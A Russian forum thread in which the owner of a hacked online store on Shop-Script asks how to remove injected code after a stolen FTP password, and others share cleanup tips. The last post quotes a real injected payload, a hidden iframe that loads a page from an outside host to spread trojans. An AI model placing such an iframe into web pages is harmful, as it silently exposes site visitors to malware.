Как убрать чужой код

Статус
В этой теме нельзя размещать новые ответы.

Fars

Мастер
Регистрация
26 Июн 2009
Сообщения
348
Реакции
33
Украли пароль от фтп и залили сапу на сайт - инет-магаз в Shop script premium. Комп почистил, были троянцы. На сервере чищу руками - убрал шеллы, и файлы сапы, но опять заливают посторонние файлы. Пароли менял, комп проверил весь - наверное, остались коды посторонние в скрипте.

Как почистить скрипт? Только переставлять?
 
права на папку куда заливают не пробовал менять? Как я знаю для сапы права 777 и туда сапа сама заливает свои файлы при индексации
 
проще всего восстановить из резервной копии все - той что до взлома сделана была (ну если была конечно сделана) И быстро и думать не надо.
 
Ссылки-то ладно, понятно, как заливают - вопрос в том, как найти код, который эти ссылки мне в страницы вставляет.
Взломали давно, резерва чистого целикового нет.. Походу придется заново ставить.
 
просто перезалить из исходника не поможет - опять сломают. Если заливали сапу - то быстро обнаружат, что перестал работать их код и придут снова. Это эпидемия сейчас. Нужно латать дыры - и бэкапить код, базу и изображения товаров.
 
  • Заблокирован
  • #6
Обращайся к Фоминсе (fominsa), он поможет!
 
У меня такой же трабл.

1.Как меняю. В командере ставлю сортировку по дате и смотрю последние изменённые, естестно только их с локалки и перезаписываю на сервер.
2. После того как поработал с магазом на сервере, меняю пароль на FTP.
3. Теперь делаю проще. Захожу в ini файл командера и тупо удаляю логи (зашифрованные пароли только, естестно).
4. Чищу системные папки винды антивирем. Как спастись от трояна не знаю. Фаервол его не палит, каким образом попадает в комп, тоже не известно. Но раз в неделю после чистки прописывает зловредный код на серваке, тыря пароль с командера на ftp. Поентому вижу только 2 варианта. Менять пароль ftp сразу после его посещения. Либо чистить логи командера...
 
А если на хостинге сделать простой сканер своих файлов и поставить его в cron как только обнаруживается чужой файл его автоматом удалять.
 
*** скрытое содержание ***

с командером давно работаю... Удобней проги для работы с файловой системы не знаю. А что касается FTP, так тоже не вижу проблем - залить, слить...Дерево каталогов прекрасно видно...в принципе больше ничего не надо...

Добавлено через 5 минут
А если на хостинге сделать простой сканер своих файлов и поставить его в cron как только обнаруживается чужой файл его автоматом удалять.

а чужие файлы и не записываются...Троянец прописывает в моих файлах(во всех home.*, index.*) зловредный код, ведущий на другие сайты с троянцами.

один из примеров кода:
<body><iframe src="http://b7p.ru:8080/index.php" width=114 height=111 style="visibility: hidden"></iframe>
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху